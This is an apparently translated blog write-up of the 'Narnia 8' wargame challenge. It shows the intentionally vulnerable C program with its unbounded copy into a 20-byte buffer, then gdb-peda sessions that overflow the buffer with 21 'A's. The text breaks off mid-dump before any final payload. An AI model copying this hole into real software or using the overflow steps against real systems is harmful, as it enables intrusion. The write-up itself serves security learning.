{"id":744,"date":"2023-09-01T14:50:40","date_gmt":"2023-09-01T12:50:40","guid":{"rendered":"https:\/\/mindshield.eu\/?p=744"},"modified":"2025-12-17T18:28:31","modified_gmt":"2025-12-17T17:28:31","slug":"narnia8","status":"publish","type":"post","link":"https:\/\/mindshield.eu\/index.php\/2023\/09\/01\/narnia8\/","title":{"rendered":"\ud83e\udd81Narnia 8"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"744\" class=\"elementor elementor-744\" data-elementor-post-type=\"post\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d9d9845 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d9d9845\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-ad37089\" data-id=\"ad37089\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-cbc917c elementor-widget elementor-widget-text-editor\" data-id=\"cbc917c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Here we are for the last challenge of the Narnia series.<\/p><p>I really enjoyed doing these challenges; they taught me a lot about buffer overflows, how a stack works, assembly, etc.<\/p><p>I hope the same goes for you!<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element 
elementor-element-a8ab34d elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"a8ab34d\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2491ddb\" data-id=\"2491ddb\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-253d492 elementor-widget elementor-widget-heading\" data-id=\"253d492\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Discovery<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-c8ba7b4 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"c8ba7b4\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-74a69d3\" data-id=\"74a69d3\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-877ced5 elementor-widget elementor-widget-code-highlight\" data-id=\"877ced5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard 
\">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c line-numbers\">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\/\/ gcc's variable reordering fucked things up\r\n\/\/ to keep the level in its old style i am\r\n\/\/ making \"i\" global until i find a fix\r\n\/\/ -morla\r\nint i;\r\n\r\nvoid func(char *b){\r\n        char *blah=b;\r\n        char bok[20];\r\n        \/\/int i=0;\r\n\r\n        memset(bok, '\\0', sizeof(bok));\r\n        \/\/ copies until the argument's terminating NUL; sizeof(bok) is never checked\r\n        for(i=0; blah[i] != '\\0'; i++)\r\n                bok[i]=blah[i];\r\n\r\n        printf(\"%s\\n\",bok);\r\n}\r\n\r\nint main(int argc, char **argv){\r\n\r\n        if(argc &gt; 1)\r\n                func(argv[1]);\r\n        else\r\n        printf(\"%s argument\\n\", argv[0]);\r\n\r\n        return 0;\r\n}<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-5370423 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"5370423\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-17d67ac\" data-id=\"17d67ac\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1183296 elementor-widget elementor-widget-text-editor\" data-id=\"1183296\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\tThis program consists, first of all, of a 
<code>main<\/code> function, which takes only one argument.<br><br>\n\nThis argument is passed to the <code>func<\/code> function and stored in the <code>blah<\/code> variable. <br>\n<blockquote>It is important to note that the <code>blah<\/code> variable has no size limit, unlike <code>bok<\/code>, which can only hold 20 characters.<\/blockquote>\n<code>bok<\/code> is then entirely zeroed out:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-bcc1fe7 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"bcc1fe7\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-821ac33\" data-id=\"821ac33\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1b684ea elementor-widget elementor-widget-code-highlight\" data-id=\"1b684ea\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp> memset(bok, '\\0', sizeof(bok));<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element 
elementor-element-eb26dba elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"eb26dba\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-ffbba7b\" data-id=\"ffbba7b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-116dddb elementor-widget elementor-widget-text-editor\" data-id=\"116dddb\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Next, <code>blah<\/code> is copied <strong>in its entirety<\/strong> into the <code>bok<\/code> array:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9bbb469 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9bbb469\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4fee5c9\" data-id=\"4fee5c9\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7cbb396 elementor-widget elementor-widget-code-highlight\" data-id=\"7cbb396\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div 
class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>for(i=0; blah[i] != '\\0'; i++)\r\n        bok[i]=blah[i];<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f31103e elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f31103e\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-16f15ff\" data-id=\"16f15ff\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-082e485 elementor-widget elementor-widget-text-editor\" data-id=\"082e485\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>You know the drill by now: this practice is very dangerous, because the loop stops only at the argument&#8217;s terminating NUL and never at the end of <code>bok<\/code>, so it writes directly onto the stack and causes an overflow.<\/p><p>Example in peda:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-88aac55 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"88aac55\" data-element_type=\"section\" 
data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-a3c7b24\" data-id=\"a3c7b24\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7f73a4c elementor-widget elementor-widget-code-highlight\" data-id=\"7f73a4c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>gdb-peda$ set args $(python2 -c 'print(\"A\"*21)')\n\ngdb-peda$ x\/16x $esp\n\n0xffffd4d4:     0x41414141      0x41414141      0x41414141      0x41414141\n0xffffd4e4:     0x41414141      0xffffd741      0xffffd4f8      0x08049211\n0xffffd4f4:     0xffffd719      0xf7ffd020      0xf7da2519      0x00000002\n0xffffd504:     0xffffd5b4      0xffffd5c0      0xffffd520      0xf7fab000\n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-7defac7 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"7defac7\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-51a1596\" data-id=\"51a1596\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div 
class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8b55d6d elementor-widget elementor-widget-text-editor\" data-id=\"8b55d6d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\tWe clearly see a run of &#8220;A&#8221;s (<code>0x41414141<\/code>) followed by a modified address: <code>0xffffd741<\/code>, whose low byte has been overwritten with 0x41, which proves that the buffer overflow is possible.\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1f40221 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"1f40221\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-10ca2f3\" data-id=\"10ca2f3\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-54856e3 elementor-widget elementor-widget-heading\" data-id=\"54856e3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Exploitation<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-c770db2 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"c770db2\" 
data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-0c6aa93\" data-id=\"0c6aa93\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c349ace elementor-widget elementor-widget-text-editor\" data-id=\"c349ace\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Let&#8217;s start by solving this challenge using <code>peda<\/code>. <br \/>For now, let&#8217;s use an argument that overflows by 1 byte:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-036890a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"036890a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f9a56d5\" data-id=\"f9a56d5\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b43a973 elementor-widget elementor-widget-code-highlight\" data-id=\"b43a973\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" 
class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>set args $(python2 -c 'print(\"A\"*21)')<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-cad206b elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"cad206b\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1aa0bac\" data-id=\"1aa0bac\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c456b8a elementor-widget elementor-widget-text-editor\" data-id=\"c456b8a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\tSet a breakpoint at the <code>test al, al<\/code> instruction.<br><br>\n\nThis is the comparison between <code>blah[i]<\/code> and <code>\\0<\/code> inside the C program&#8217;s for loop (<code>for(i=0; <strong>blah[i] != '\\0'<\/strong>; i++)<\/code>).<br> <br>\n\nThis is where we will find out whether the buffer overflow worked:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1690a07 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"1690a07\" data-element_type=\"section\" 
data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c5a0380\" data-id=\"c5a0380\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1b1ffa3 elementor-widget elementor-widget-code-highlight\" data-id=\"1b1ffa3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>b *func+92<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-09c49a7 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"09c49a7\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-eeb6ad7\" data-id=\"eeb6ad7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7804199 elementor-widget elementor-widget-text-editor\" data-id=\"7804199\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Then continue past each breakpoint hit 
with the &#8216;c&#8217; command. We can see the buffer filling up little by little.<\/p><p>Here is what peda looks like when we reach the 20 &#8220;A&#8221;s:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d99d390 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d99d390\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-9a9a743\" data-id=\"9a9a743\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ce4b1c4 elementor-widget elementor-widget-code-highlight\" data-id=\"ce4b1c4\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>[----------------------------------registers-----------------------------------]\r\nEAX: 0x41 ('A')\r\nEBX: 0xf7fab000 -&gt; 0x229dac\r\nECX: 0x14\r\nEDX: 0x14\r\nESI: 0xffffd5b4 --&gt; 0xffffd708 (\"\/narnia\/narnia8\")\r\nEDI: 0xf7ffcb80 --&gt; 0x0\r\nEBP: 0xffffd4ec --&gt; 0xffffd4f8 --&gt; 0xf7ffd020 --&gt; 0xf7ffda40 --&gt; 0x0\r\nESP: 0xffffd4d4 ('A' , \"\\030\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\nEIP: 0x80491e2 (:      test   al,al)\r\nEFLAGS: 0x282 (carry parity adjust zero SIGN 
trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x80491da : mov    eax,DWORD PTR [ebp-0x4]\r\n   0x80491dd : add    eax,edx\r\n   0x80491df : movzx  eax,BYTE PTR [eax]\r\n=&gt; 0x80491e2 : test   al,al\r\n   0x80491e4 : jne    0x80491ae \r\n   0x80491e6 : lea    eax,[ebp-0x18]\r\n   0x80491e9 : push   eax\r\n   0x80491ea :        push   0x804a008\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xffffd4d4 ('A' , \"\\030\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0004| 0xffffd4d8 ('A' , \"\\030\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0008| 0xffffd4dc ('A' , \"\\030\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0012| 0xffffd4e0 (\"AAAAAAAA\\030\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0016| 0xffffd4e4 (\"AAAA\\030\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0020| 0xffffd4e8 --&gt; 0xffffd718 ('A' )\r\n0024| 0xffffd4ec --&gt; 0xffffd4f8 --&gt; 0xf7ffd020 --&gt;; 0xf7ffda40 --&gt; 0x0\r\n0028| 0xffffd4f0 --&gt; 0x8049211 (<main>:      add    esp,0x4)\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x080491e2 in func ()\r\ngdb-peda$\r\n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-5e2f7bf elementor-section-boxed elementor-section-height-default elementor-section-height-default\" 
data-id=\"5e2f7bf\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d7a2283\" data-id=\"d7a2283\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-2e10b3e elementor-widget elementor-widget-text-editor\" data-id=\"2e10b3e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\tWe can see that from address <code>0xffffd4d4<\/code> up to <code>0xffffd4e4<\/code>, the stack has been filled with A&#8217;s. <br><br>\n\nThen, at address <code>0xffffd4e8<\/code>, we have our pointer to our argument.<br><br>\n\n<blockquote>What happens when we add one more A?<\/blockquote>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-6492a66 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"6492a66\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-43fd3a7\" data-id=\"43fd3a7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0ee8655 elementor-widget elementor-widget-code-highlight\" data-id=\"0ee8655\" 
data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>[----------------------------------registers-----------------------------------]\r\nEAX: 0x69 ('i')\r\nEBX: 0xf7fab000 --&gt; 0x229dac\r\nECX: 0x14\r\nEDX: 0x15\r\nESI: 0xffffd5b4 --&gt; 0xffffd708 (\"\/narnia\/narnia8\")\r\nEDI: 0xf7ffcb80 --&gt; 0x0\r\nEBP: 0xffffd4ec --&gt; 0xffffd4f8 --&gt; 0xf7ffd020 --&gt; 0xf7ffda40 --&gt; 0x0\r\nESP: 0xffffd4d4 ('A' , \"\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\nEIP: 0x80491e2 (:      test   al,al)\r\nEFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x80491da : mov    eax,DWORD PTR [ebp-0x4]\r\n   0x80491dd : add    eax,edx\r\n   0x80491df : movzx  eax,BYTE PTR [eax]\r\n=&gt; 0x80491e2 : test   al,al\r\n   0x80491e4 : jne    0x80491ae \r\n   0x80491e6 : lea    eax,[ebp-0x18]\r\n   0x80491e9 : push   eax\r\n   0x80491ea :        push   0x804a008\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xffffd4d4 ('A' , \"\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0004| 0xffffd4d8 ('A' , 